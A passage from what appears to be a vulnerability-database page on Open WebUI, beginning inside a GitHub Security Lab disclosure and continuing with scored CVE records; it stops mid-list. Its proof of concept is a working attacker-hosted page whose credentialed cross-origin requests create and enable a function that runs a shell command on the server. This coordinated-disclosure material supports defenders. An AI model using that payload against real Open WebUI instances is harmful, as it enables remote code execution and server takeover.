The FastAPI CORS middleware is not safe by default, meaning it reflects the origin when specifying `allow_origins=["*"]`.  Remove the vulnerable, broad origin and allow users to dynamically setup the exact allowed origins via the administration panel or config file, do not allow for broad origins such as `"*"` or `"*.com"`

#### Proof of Concept

Host the following code on your website, `attacker.com`. Open the webpage using Firefox, and click on the webpage as instructed. Check your openwebui host to see the result of the command `whoami` placed into a newly created file `/tmp/whoami.txt`. Ensure you have logged into an admin open-webui account 
```javascript
<body>
    <p>Click here to login.</p>
    <div id="response"></div>
 
    <script>
      //Firefox cross site cookie request bypass
      const url = 'http://localhost:3000/static/favicon.png';
      document.addEventListener("DOMContentLoaded", () => {
        document.onclick = () => {
          open(url);
          filter_id = "okok"
//Create a function/filter to write code
fetch('http://localhost:3000/api/v1/functions/create', {
  method: 'POST',
  headers: {
    'Content-Type': 'application/json'
  },
  body: JSON.stringify({
    "id": filter_id,
    "name": "test2",
    "meta": {"description": "test2"},
    "content": "from pydantic import BaseModel, Field\nfrom typing import Optional\n\n\nclass Filter:\n    class Valves(BaseModel):\n        priority: int = Field(\n            default=0, description=\"Priority level for the filter operations.\"\n        )\n        max_turns: int = Field(\n            default=8, description=\"Maximum allowable conversation turns for a user.\"\n        )\n        pass\n\n    class UserValves(BaseModel):\n        max_turns: int = Field(\n            default=4, description=\"Maximum allowable conversation turns for a user.\"\n        )\n        pass\n\n    def __init__(self):\n        # Indicates custom file handling logic. This flag helps disengage default routines in favor of custom\n        # implementations, informing the WebUI to defer file-related operations to designated methods within this class.\n        # Alternatively, you can remove the files directly from the body in from the inlet hook\n        # self.file_handler = True\n\n        # Initialize 'valves' with specific configurations. Using 'Valves' instance helps encapsulate settings,\n        # which ensures settings are managed cohesively and not confused with operational flags like 'file_handler'.\n        self.valves = self.Valves()\n        f = open(\"/tmp/whoami.txt\", \"w\")\n        import subprocess\n\n        output = subprocess.getoutput(\"whoami\")\n        f.write(output)\n        f.close()\n        pass\n\n    def inlet(self, body: dict, __user__: Optional[dict] = None) -> dict:\n        return body\n\n    def outlet(self, body: dict, __user__: Optional[dict] = None) -> dict:\n        return body\n"
  }),
  credentials: 'include' // This will send cookies from the origin
})
.then(response => response.json())
.then(data => console.log(data))
.catch((error) => console.error('Error:', error)); 


//Toggle the filter to execute code
fetch(`http://localhost:3000/api/v1/functions/id/${filter_id}/toggle`, {
  method: 'POST',
  credentials: 'include' // This will send cookies from the origin
})
.then(response => response.json())
.then(data => console.log(data))
.catch((error) => console.error('Error:', error)); 
        }
      });
    </script>
  </body>
```

### Issue 2: Failure to Invalidate Session on Logout (`GHSL-2024-175`)

Openwebui fails to invalidate and clear session cookies after logout. In fact, it seems to reuse the same session cookies. This allows an attacker who has access to previous session cookie details to login at a later point as long as the victim has not closed their browser.

This vulnerability is relevant to the above CORS issue because it no longer requires the user to be logged in to exploit. If the cookie had been properly invalidated/cleared, the CORS issue would only affect logged in users. 

#### Impact

This issue may increase the impact of primitives gained from other security issues.

#### Remediation

For every session, new cookies should be generated. When a user logouts, the session cookies from the previous session should be invalidated and removed from the browser's storage.

#### Resources
[OWASP Recommendation On Sessions](https://cheatsheetseries.owasp.org/cheatsheets/Session_Management_Cheat_Sheet.html)

## GitHub Security Advisories

We recommend you create a private [GitHub Security Advisory](https://help.github.com/en/github/managing-security-vulnerabilities/creating-a-security-advisory) for these findings. This also allows you to invite the GHSL team to collaborate and further discuss these findings in private before they are [published](https://help.github.com/en/github/managing-security-vulnerabilities/publishing-a-security-advisory).

## Credit

These issues were discovered and reported by GHSL team member [@Kwstubbs (Kevin Stubbings)](https://github.com/Kwstubbs).

## Contact

You can contact the GHSL team at `securitylab@github.com`, please include a reference to `GHSL-2024-174` or `GHSL-2024-175` in any communication regarding these issues.

## Disclosure Policy

This report is subject to a 90-day disclosure deadline, as described in more detail in our [coordinated disclosure policy](https://securitylab.github.com/advisories#policy).
references
0
reference_url https://github.com/open-webui/open-webui
reference_id
reference_type
scores
0
value 8.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:H/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/open-webui/open-webui
1
reference_url https://github.com/open-webui/open-webui/security/advisories/GHSA-6xcp-7mpr-m7wm
reference_id
reference_type
scores
0
value 8.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:H/A:H
1
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
2
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/open-webui/open-webui/security/advisories/GHSA-6xcp-7mpr-m7wm
2
reference_url https://github.com/advisories/GHSA-6xcp-7mpr-m7wm
reference_id GHSA-6xcp-7mpr-m7wm
reference_type
scores
0
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-6xcp-7mpr-m7wm
fixed_packages
0
url pkg:pypi/open-webui@0.3.33
purl pkg:pypi/open-webui@0.3.33
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-14xt-qwyg-w3cj
1
vulnerability VCID-1g27-4vq6-7kdz
2
vulnerability VCID-1svn-zazq-e3f2
3
vulnerability VCID-1tu1-b9de-nfaa
4
vulnerability VCID-2rs8-62x1-s7h7
5
vulnerability VCID-2xdz-v8cw-fygv
6
vulnerability VCID-32yb-vsfs-43a8
7
vulnerability VCID-3436-znsq-guds
8
vulnerability VCID-4rz6-hw32-jueb
9
vulnerability VCID-4sn4-mrbm-dfgh
10
vulnerability VCID-4v8w-kv6g-kkbc
11
vulnerability VCID-4x63-8x64-d3bq
12
vulnerability VCID-5319-t7jm-y3bx
13
vulnerability VCID-5jna-wvd7-j7cm
14
vulnerability VCID-5wfg-zqcy-c7ar
15
vulnerability VCID-5wzn-mfwg-ybc3
16
vulnerability VCID-66zh-9jk7-9bfx
17
vulnerability VCID-6rbm-rm25-hqgy
18
vulnerability VCID-7j5a-pu4k-kucf
19
vulnerability VCID-7nbc-ng1s-suck
20
vulnerability VCID-8n6u-wgz9-1bgj
21
vulnerability VCID-8nzh-cpda-dkca
22
vulnerability VCID-8y4k-pj2n-8uhm
23
vulnerability VCID-94nj-qkdf-xfhn
24
vulnerability VCID-9jud-sr2a-8yc3
25
vulnerability VCID-9zyk-459z-x3a4
26
vulnerability VCID-chug-ma8r-cucc
27
vulnerability VCID-cw4k-3s8z-uqh8
28
vulnerability VCID-dz6g-jgmg-wqce
29
vulnerability VCID-dzh3-rqx4-fqhv
30
vulnerability VCID-ef1t-pxjm-j7cz
31
vulnerability VCID-gw77-ux3j-qfaa
32
vulnerability VCID-hj5f-yk3y-ffdg
33
vulnerability VCID-jfs9-dps1-27a2
34
vulnerability VCID-jnsg-u9dy-r3d5
35
vulnerability VCID-k17g-bd9g-67f7
36
vulnerability VCID-k9jf-5jzd-pkge
37
vulnerability VCID-mn21-kwuu-w7by
38
vulnerability VCID-n4ma-zcpv-5fbp
39
vulnerability VCID-nxvm-97r4-6ybz
40
vulnerability VCID-pkds-1xgn-q3bv
41
vulnerability VCID-pvep-chj7-ekeg
42
vulnerability VCID-pwsg-72yy-quhk
43
vulnerability VCID-q682-k826-efhv
44
vulnerability VCID-qgfh-7u8n-y7c7
45
vulnerability VCID-qjt1-zxx8-r7ht
46
vulnerability VCID-r7vt-4bqm-f7hb
47
vulnerability VCID-reqw-pfm8-c7g5
48
vulnerability VCID-rhhj-rccv-87hw
49
vulnerability VCID-s625-eg1w-gfd1
50
vulnerability VCID-t571-d65a-cyb2
51
vulnerability VCID-tz2k-gazs-mqgd
52
vulnerability VCID-u25g-p4nx-gqd1
53
vulnerability VCID-ujye-g4rj-8be5
54
vulnerability VCID-um53-kf7u-kkg6
55
vulnerability VCID-vghe-uuzj-m7cu
56
vulnerability VCID-vkx3-71kv-sugt
57
vulnerability VCID-w2vd-r3hr-w3bt
58
vulnerability VCID-wb88-83cj-ffhy
59
vulnerability VCID-wcz4-vwx4-tufb
60
vulnerability VCID-yug9-shts-kufb
61
vulnerability VCID-yysb-dk2k-f7g4
62
vulnerability VCID-ze3m-g96u-27fc
resource_url http://public2.vulnerablecode.io/packages/pkg:pypi/open-webui@0.3.33
aliases GHSA-6xcp-7mpr-m7wm
risk_score 4.0
exploitability 0.5
weighted_severity 8.0
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-68jf-2utx-x7br
20
url VCID-6rbm-rm25-hqgy
vulnerability_id VCID-6rbm-rm25-hqgy
summary Open WebUI is a self-hosted artificial intelligence platform designed to operate entirely offline. Prior to 0.8.11, an internal-only bypass_filter parameter is exposed on the /openai/chat/completions and /ollama/api/chat HTTP endpoints via FastAPI query string binding, allowing any authenticated user to append ?bypass_filter=true and bypass model access control checks to invoke admin-restricted models. This vulnerability is fixed in 0.8.11.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2026-45365
reference_id
reference_type
scores
0
value 0.0003
scoring_system epss
scoring_elements 0.09067
published_at 2026-06-12T12:55:00Z
1
value 0.0003
scoring_system epss
scoring_elements 0.09057
published_at 2026-06-14T12:55:00Z
2
value 0.0003
scoring_system epss
scoring_elements 0.09019
published_at 2026-06-11T12:55:00Z
3
value 0.0003
scoring_system epss
scoring_elements 0.09069
published_at 2026-06-13T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2026-45365
1
reference_url https://github.com/open-webui/open-webui
reference_id
reference_type
scores
0
value 5.4
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/open-webui/open-webui
2
reference_url https://github.com/open-webui/open-webui/commit/c0385f60ba049da48d2d5452068586d375303c37
reference_id
reference_type
scores
0
value 5.4
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/open-webui/open-webui/commit/c0385f60ba049da48d2d5452068586d375303c37
3
reference_url https://nvd.nist.gov/vuln/detail/CVE-2026-45365
reference_id
reference_type
scores
0
value 5.4
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2026-45365
4
reference_url https://github.com/advisories/GHSA-v6qf-75pr-p96m
reference_id GHSA-v6qf-75pr-p96m
reference_type
scores
0
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-v6qf-75pr-p96m
5
reference_url https://github.com/open-webui/open-webui/security/advisories/GHSA-v6qf-75pr-p96m
reference_id GHSA-v6qf-75pr-p96m
reference_type
scores
0
value 5.4
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N
1
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
2
value MODERATE
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-19T12:26:51Z/
url https://github.com/open-webui/open-webui/security/advisories/GHSA-v6qf-75pr-p96m
fixed_packages
0
url pkg:pypi/open-webui@0.8.11
purl pkg:pypi/open-webui@0.8.11
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-14xt-qwyg-w3cj
1
vulnerability VCID-1g27-4vq6-7kdz
2
vulnerability VCID-1tu1-b9de-nfaa
3
vulnerability VCID-2xdz-v8cw-fygv
4
vulnerability VCID-32yb-vsfs-43a8
5
vulnerability VCID-3436-znsq-guds
6
vulnerability VCID-4v8w-kv6g-kkbc
7
vulnerability VCID-4x63-8x64-d3bq
8
vulnerability VCID-5319-t7jm-y3bx
9
vulnerability VCID-5jna-wvd7-j7cm
10
vulnerability VCID-5wfg-zqcy-c7ar
11
vulnerability VCID-5wzn-mfwg-ybc3
12
vulnerability VCID-8nzh-cpda-dkca
13
vulnerability VCID-8y4k-pj2n-8uhm
14
vulnerability VCID-chug-ma8r-cucc
15
vulnerability VCID-cw4k-3s8z-uqh8
16
vulnerability VCID-dz6g-jgmg-wqce
17
vulnerability VCID-dzh3-rqx4-fqhv
18
vulnerability VCID-ef1t-pxjm-j7cz
19
vulnerability VCID-hj5f-yk3y-ffdg
20
vulnerability VCID-jfs9-dps1-27a2
21
vulnerability VCID-n4ma-zcpv-5fbp
22
vulnerability VCID-nxvm-97r4-6ybz
23
vulnerability VCID-pkds-1xgn-q3bv
24
vulnerability VCID-q682-k826-efhv
25
vulnerability VCID-qgfh-7u8n-y7c7
26
vulnerability VCID-qjt1-zxx8-r7ht
27
vulnerability VCID-r7vt-4bqm-f7hb
28
vulnerability VCID-reqw-pfm8-c7g5
29
vulnerability VCID-rhhj-rccv-87hw
30
vulnerability VCID-s625-eg1w-gfd1
31
vulnerability VCID-t571-d65a-cyb2
32
vulnerability VCID-vghe-uuzj-m7cu
33
vulnerability VCID-vkx3-71kv-sugt
34
vulnerability VCID-w2vd-r3hr-w3bt
35
vulnerability VCID-wcz4-vwx4-tufb
36
vulnerability VCID-yug9-shts-kufb
37
vulnerability VCID-yysb-dk2k-f7g4
38
vulnerability VCID-ze3m-g96u-27fc
resource_url http://public2.vulnerablecode.io/packages/pkg:pypi/open-webui@0.8.11
aliases CVE-2026-45365, GHSA-v6qf-75pr-p96m
risk_score 3.1
exploitability 0.5
weighted_severity 6.2
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-6rbm-rm25-hqgy
21
url VCID-7j5a-pu4k-kucf
vulnerability_id VCID-7j5a-pu4k-kucf
summary open-webui v0.6.33 is vulnerable to Incorrect Access Control. The API /api/tasks/stop/ directly accesses and cancels tasks without verifying user ownership, enabling attackers (a normal user) to stop arbitrary LLM response tasks.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2025-63681
reference_id
reference_type
scores
0
value 0.00017
scoring_system epss
scoring_elements 0.04616
published_at 2026-06-12T12:55:00Z
1
value 0.00017
scoring_system epss
scoring_elements 0.04594
published_at 2026-06-14T12:55:00Z
2
value 0.00017
scoring_system epss
scoring_elements 0.04602
published_at 2026-06-13T12:55:00Z
3
value 0.00017
scoring_system epss
scoring_elements 0.04617
published_at 2026-06-11T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2025-63681
1
reference_url https://github.com/open-webui/open-webui
reference_id
reference_type
scores
0
value 2.1
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:P
1
value LOW
scoring_system generic_textual
scoring_elements
url https://github.com/open-webui/open-webui
2
reference_url https://nvd.nist.gov/vuln/detail/CVE-2025-63681
reference_id CVE-2025-63681
reference_type
scores
0
value 2.1
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:P
1
value LOW
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2025-63681
3
reference_url https://github.com/advisories/GHSA-frv8-gffc-37px
reference_id GHSA-frv8-gffc-37px
reference_type
scores
0
value LOW
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-frv8-gffc-37px
4
reference_url https://github.com/open-webui/open-webui/blob/46ae3f4f5d7d4d706041bdae4ad2d802e568712b/backend/open_webui/main.py#L1652
reference_id main.py#L1652
reference_type
scores
0
value 4.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N
1
value 2.1
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:P
2
value LOW
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-12-05T19:50:21Z/
url https://github.com/open-webui/open-webui/blob/46ae3f4f5d7d4d706041bdae4ad2d802e568712b/backend/open_webui/main.py#L1652
5
reference_url https://github.com/TOAST-Research/pocs/blob/main/openwebui/arbitirary_task_stop/report.md
reference_id report.md
reference_type
scores
0
value 4.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N
1
value 2.1
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:P
2
value LOW
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-12-05T19:50:21Z/
url https://github.com/TOAST-Research/pocs/blob/main/openwebui/arbitirary_task_stop/report.md
fixed_packages
0
url pkg:pypi/open-webui@0.6.34
purl pkg:pypi/open-webui@0.6.34
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-14xt-qwyg-w3cj
1
vulnerability VCID-1g27-4vq6-7kdz
2
vulnerability VCID-1tu1-b9de-nfaa
3
vulnerability VCID-2rs8-62x1-s7h7
4
vulnerability VCID-2xdz-v8cw-fygv
5
vulnerability VCID-32yb-vsfs-43a8
6
vulnerability VCID-3436-znsq-guds
7
vulnerability VCID-4rz6-hw32-jueb
8
vulnerability VCID-4v8w-kv6g-kkbc
9
vulnerability VCID-4x63-8x64-d3bq
10
vulnerability VCID-5319-t7jm-y3bx
11
vulnerability VCID-5jna-wvd7-j7cm
12
vulnerability VCID-5wfg-zqcy-c7ar
13
vulnerability VCID-5wzn-mfwg-ybc3
14
vulnerability VCID-66zh-9jk7-9bfx
15
vulnerability VCID-6rbm-rm25-hqgy
16
vulnerability VCID-7nbc-ng1s-suck
17
vulnerability VCID-8n6u-wgz9-1bgj
18
vulnerability VCID-8nzh-cpda-dkca
19
vulnerability VCID-8y4k-pj2n-8uhm
20
vulnerability VCID-94nj-qkdf-xfhn
21
vulnerability VCID-9jud-sr2a-8yc3
22
vulnerability VCID-chug-ma8r-cucc
23
vulnerability VCID-cw4k-3s8z-uqh8
24
vulnerability VCID-dz6g-jgmg-wqce
25
vulnerability VCID-dzh3-rqx4-fqhv
26
vulnerability VCID-ef1t-pxjm-j7cz
27
vulnerability VCID-hj5f-yk3y-ffdg
28
vulnerability VCID-jfs9-dps1-27a2
29
vulnerability VCID-jnsg-u9dy-r3d5
30
vulnerability VCID-k9jf-5jzd-pkge
31
vulnerability VCID-n4ma-zcpv-5fbp
32
vulnerability VCID-nxvm-97r4-6ybz
33
vulnerability VCID-pkds-1xgn-q3bv
34
vulnerability VCID-pvep-chj7-ekeg
35
vulnerability VCID-pwsg-72yy-quhk
36
vulnerability VCID-q682-k826-efhv
37
vulnerability VCID-qgfh-7u8n-y7c7
38
vulnerability VCID-qjt1-zxx8-r7ht
39
vulnerability VCID-r7vt-4bqm-f7hb
40
vulnerability VCID-reqw-pfm8-c7g5
41
vulnerability VCID-rhhj-rccv-87hw
42
vulnerability VCID-s625-eg1w-gfd1
43
vulnerability VCID-t571-d65a-cyb2
44
vulnerability VCID-u25g-p4nx-gqd1
45
vulnerability VCID-ujye-g4rj-8be5
46
vulnerability VCID-um53-kf7u-kkg6
47
vulnerability VCID-vghe-uuzj-m7cu
48
vulnerability VCID-vkx3-71kv-sugt
49
vulnerability VCID-w2vd-r3hr-w3bt
50
vulnerability VCID-wb88-83cj-ffhy
51
vulnerability VCID-wcz4-vwx4-tufb
52
vulnerability VCID-yug9-shts-kufb
53
vulnerability VCID-yysb-dk2k-f7g4
54
vulnerability VCID-ze3m-g96u-27fc
resource_url http://public2.vulnerablecode.io/packages/pkg:pypi/open-webui@0.6.34
aliases CVE-2025-63681, GHSA-frv8-gffc-37px
risk_score 1.9
exploitability 0.5
weighted_severity 3.9
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-7j5a-pu4k-kucf
22
url VCID-7nbc-ng1s-suck
vulnerability_id VCID-7nbc-ng1s-suck
summary Open WebUI is a self-hosted artificial intelligence platform designed to operate entirely offline. Prior to version 0.8.6, any authenticated user can read other users' private memories via `/api/v1/retrieval/query/collection`. Version 0.8.6 patches the issue.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2026-29071
reference_id
reference_type
scores
0
value 0.00013
scoring_system epss
scoring_elements 0.02293
published_at 2026-06-14T12:55:00Z
1
value 0.00013
scoring_system epss
scoring_elements 0.02291
published_at 2026-06-11T12:55:00Z
2
value 0.00013
scoring_system epss
scoring_elements 0.02286
published_at 2026-06-13T12:55:00Z
3
value 0.00013
scoring_system epss
scoring_elements 0.0229
published_at 2026-06-12T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2026-29071
1
reference_url https://github.com/open-webui/open-webui
reference_id
reference_type
scores
0
value 3.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:N/A:N
1
value LOW
scoring_system generic_textual
scoring_elements
url https://github.com/open-webui/open-webui
2
reference_url https://nvd.nist.gov/vuln/detail/CVE-2026-29071
reference_id
reference_type
scores
0
value 3.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:N/A:N
1
value LOW
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2026-29071
3
reference_url https://github.com/advisories/GHSA-w9f8-gxf9-rhvw
reference_id GHSA-w9f8-gxf9-rhvw
reference_type
scores
0
value LOW
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-w9f8-gxf9-rhvw
4
reference_url https://github.com/open-webui/open-webui/security/advisories/GHSA-w9f8-gxf9-rhvw
reference_id GHSA-w9f8-gxf9-rhvw
reference_type
scores
0
value 3.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:N/A:N
1
value LOW
scoring_system cvssv3.1_qr
scoring_elements
2
value LOW
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-03-27T20:06:23Z/
url https://github.com/open-webui/open-webui/security/advisories/GHSA-w9f8-gxf9-rhvw
fixed_packages
0
url pkg:pypi/open-webui@0.8.6
purl pkg:pypi/open-webui@0.8.6
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-14xt-qwyg-w3cj
1
vulnerability VCID-1g27-4vq6-7kdz
2
vulnerability VCID-1tu1-b9de-nfaa
3
vulnerability VCID-2xdz-v8cw-fygv
4
vulnerability VCID-32yb-vsfs-43a8
5
vulnerability VCID-3436-znsq-guds
6
vulnerability VCID-4v8w-kv6g-kkbc
7
vulnerability VCID-4x63-8x64-d3bq
8
vulnerability VCID-5319-t7jm-y3bx
9
vulnerability VCID-5jna-wvd7-j7cm
10
vulnerability VCID-5wfg-zqcy-c7ar
11
vulnerability VCID-5wzn-mfwg-ybc3
12
vulnerability VCID-6rbm-rm25-hqgy
13
vulnerability VCID-8nzh-cpda-dkca
14
vulnerability VCID-8y4k-pj2n-8uhm
15
vulnerability VCID-chug-ma8r-cucc
16
vulnerability VCID-cw4k-3s8z-uqh8
17
vulnerability VCID-dz6g-jgmg-wqce
18
vulnerability VCID-dzh3-rqx4-fqhv
19
vulnerability VCID-ef1t-pxjm-j7cz
20
vulnerability VCID-hj5f-yk3y-ffdg
21
vulnerability VCID-jfs9-dps1-27a2
22
vulnerability VCID-k9jf-5jzd-pkge
23
vulnerability VCID-n4ma-zcpv-5fbp
24
vulnerability VCID-nxvm-97r4-6ybz
25
vulnerability VCID-pkds-1xgn-q3bv
26
vulnerability VCID-q682-k826-efhv
27
vulnerability VCID-qgfh-7u8n-y7c7
28
vulnerability VCID-qjt1-zxx8-r7ht
29
vulnerability VCID-r7vt-4bqm-f7hb
30
vulnerability VCID-reqw-pfm8-c7g5
31
vulnerability VCID-rhhj-rccv-87hw
32
vulnerability VCID-s625-eg1w-gfd1
33
vulnerability VCID-t571-d65a-cyb2
34
vulnerability VCID-um53-kf7u-kkg6
35
vulnerability VCID-vghe-uuzj-m7cu
36
vulnerability VCID-vkx3-71kv-sugt
37
vulnerability VCID-w2vd-r3hr-w3bt
38
vulnerability VCID-wb88-83cj-ffhy
39
vulnerability VCID-wcz4-vwx4-tufb
40
vulnerability VCID-yug9-shts-kufb
41
vulnerability VCID-yysb-dk2k-f7g4
42
vulnerability VCID-ze3m-g96u-27fc
resource_url http://public2.vulnerablecode.io/packages/pkg:pypi/open-webui@0.8.6
aliases CVE-2026-29071, GHSA-w9f8-gxf9-rhvw
risk_score 1.4
exploitability 0.5
weighted_severity 2.8
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-7nbc-ng1s-suck
23
url VCID-8n6u-wgz9-1bgj
vulnerability_id VCID-8n6u-wgz9-1bgj
summary Open WebUI is a self-hosted artificial intelligence platform designed to operate entirely offline. Prior to version 0.8.6, an unsanitized filename field in the speech-to-text transcription endpoint allows any authenticated non-admin user to trigger a `FileNotFoundError` whose message — including the server's absolute `DATA_DIR` path — is returned verbatim in the HTTP 400 response body, confirming information disclosure on all default deployments. Version 0.8.6 patches the issue.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2026-28786
reference_id
reference_type
scores
0
value 0.00037
scoring_system epss
scoring_elements 0.11325
published_at 2026-06-14T12:55:00Z
1
value 0.00037
scoring_system epss
scoring_elements 0.11302
published_at 2026-06-11T12:55:00Z
2
value 0.00037
scoring_system epss
scoring_elements 0.11358
published_at 2026-06-13T12:55:00Z
3
value 0.00037
scoring_system epss
scoring_elements 0.11371
published_at 2026-06-12T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2026-28786
1
reference_url https://github.com/open-webui/open-webui
reference_id
reference_type
scores
0
value 4.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/open-webui/open-webui
2
reference_url https://github.com/open-webui/open-webui/commit/387225eb8b3906909436004f84fff1b012e067d4
reference_id
reference_type
scores
0
value 4.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/open-webui/open-webui/commit/387225eb8b3906909436004f84fff1b012e067d4
3
reference_url https://nvd.nist.gov/vuln/detail/CVE-2026-28786
reference_id
reference_type
scores
0
value 4.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2026-28786
4
reference_url https://github.com/advisories/GHSA-vvxm-vxmr-624h
reference_id GHSA-vvxm-vxmr-624h
reference_type
scores
0
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-vvxm-vxmr-624h
5
reference_url https://github.com/open-webui/open-webui/security/advisories/GHSA-vvxm-vxmr-624h
reference_id GHSA-vvxm-vxmr-624h
reference_type
scores
0
value 4.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N
1
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
2
value MODERATE
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-03-27T13:27:12Z/
url https://github.com/open-webui/open-webui/security/advisories/GHSA-vvxm-vxmr-624h
fixed_packages
0
url pkg:pypi/open-webui@0.8.6
purl pkg:pypi/open-webui@0.8.6
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-14xt-qwyg-w3cj
1
vulnerability VCID-1g27-4vq6-7kdz
2
vulnerability VCID-1tu1-b9de-nfaa
3
vulnerability VCID-2xdz-v8cw-fygv
4
vulnerability VCID-32yb-vsfs-43a8
5
vulnerability VCID-3436-znsq-guds
6
vulnerability VCID-4v8w-kv6g-kkbc
7
vulnerability VCID-4x63-8x64-d3bq
8
vulnerability VCID-5319-t7jm-y3bx
9
vulnerability VCID-5jna-wvd7-j7cm
10
vulnerability VCID-5wfg-zqcy-c7ar
11
vulnerability VCID-5wzn-mfwg-ybc3
12
vulnerability VCID-6rbm-rm25-hqgy
13
vulnerability VCID-8nzh-cpda-dkca
14
vulnerability VCID-8y4k-pj2n-8uhm
15
vulnerability VCID-chug-ma8r-cucc
16
vulnerability VCID-cw4k-3s8z-uqh8
17
vulnerability VCID-dz6g-jgmg-wqce
18
vulnerability VCID-dzh3-rqx4-fqhv
19
vulnerability VCID-ef1t-pxjm-j7cz
20
vulnerability VCID-hj5f-yk3y-ffdg
21
vulnerability VCID-jfs9-dps1-27a2
22
vulnerability VCID-k9jf-5jzd-pkge
23
vulnerability VCID-n4ma-zcpv-5fbp
24
vulnerability VCID-nxvm-97r4-6ybz
25
vulnerability VCID-pkds-1xgn-q3bv
26
vulnerability VCID-q682-k826-efhv
27
vulnerability VCID-qgfh-7u8n-y7c7
28
vulnerability VCID-qjt1-zxx8-r7ht
29
vulnerability VCID-r7vt-4bqm-f7hb
30
vulnerability VCID-reqw-pfm8-c7g5
31
vulnerability VCID-rhhj-rccv-87hw
32
vulnerability VCID-s625-eg1w-gfd1
33
vulnerability VCID-t571-d65a-cyb2
34
